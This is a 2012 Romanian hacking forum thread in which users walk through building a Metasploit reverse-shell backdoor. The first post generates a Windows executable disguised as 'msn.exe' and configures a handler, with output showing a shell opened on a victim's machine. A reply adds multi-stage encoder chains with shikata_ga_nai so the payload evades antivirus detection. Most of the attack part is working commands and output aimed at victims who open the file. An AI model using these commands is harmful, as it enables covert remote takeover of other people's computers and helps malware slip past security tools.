dr.d3v1l Posted June 1, 2012 Report Posted June 1, 2012 msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 (ip) LPORT=31337 (port) X >/tmp/msn.exe (nume backdoor)înainte ca cineva s?-l deschida trebuie sa setam msf.msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcp.msf exploit(handler) > set LHOST 192.168.1.101LHOST => 192.168.1.101msf exploit(handler) > set LPORT 31337LPORT => 31337msf exploit(handler) > exploit[*] Started reverse handler on port 31337[*] Starting the payload handler…sa vedem ce se întâmpl? atunci când victim? il deschide [*] Sending stage (240 bytes)[*] Command shell session 1 opened (192.168.1.10:31337 -> 192.168.1.253:1049)Microsoft Windows XP [Versione 5.1.2600]© Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\ago\Documenti\Download> Quote
neox Posted June 1, 2012 Report Posted June 1, 2012 slab nu vreu sa te atac sau alceva dar o gramada de tutoriale metasploit pe net, nici macar nu ai folosit encoder pentru a coda conectiunea meterpreter asa cum ai prezentat tu din prima il depisteaza ca virus ./msfencode -lFramework Encoders==================Name Rank Description---- ---- -----------cmd/generic_sh normal Generic Shell Variable Substitution Command Encodergeneric/none normal The "none" Encodermipsbe/longxor normal XOR Encodermipsle/longxor normal XOR Encoderphp/base64 normal PHP Base64 encoderppc/longxor normal PPC LongXOR Encoderppc/longxor_tag normal PPC LongXOR Encodersparc/longxor_tag normal SPARC DWORD XOR Encoderx86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoderx86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoderx86/avoid_utf8_tolower manual Avoid UTF8/tolowerx86/call4_dword_xor normal Call+4 Dword XOR Encoderx86/countdown normal Single-byte XOR Countdown Encoderx86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoderx86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoderx86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoderx86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder./msfpayload windows/shell_reverse_tcp LHOST=IP LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/bla.exeSau folosesti trei encodere diferite, dintre care doua le va rula prin intermediul de 10 ori fiecare encoder, pentru un total de 21 codificare./msfpayload windows/shell_reverse_tcp LHOST=IP LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/bla1.exe Quote
dr.d3v1l Posted June 1, 2012 Author Report Posted June 1, 2012 debia am inceput sa invat metasploit Quote
neox Posted June 1, 2012 Report Posted June 1, 2012 (edited) atunci nu am zis nimic spor la invatat in continuare Edited June 1, 2012 by neox Quote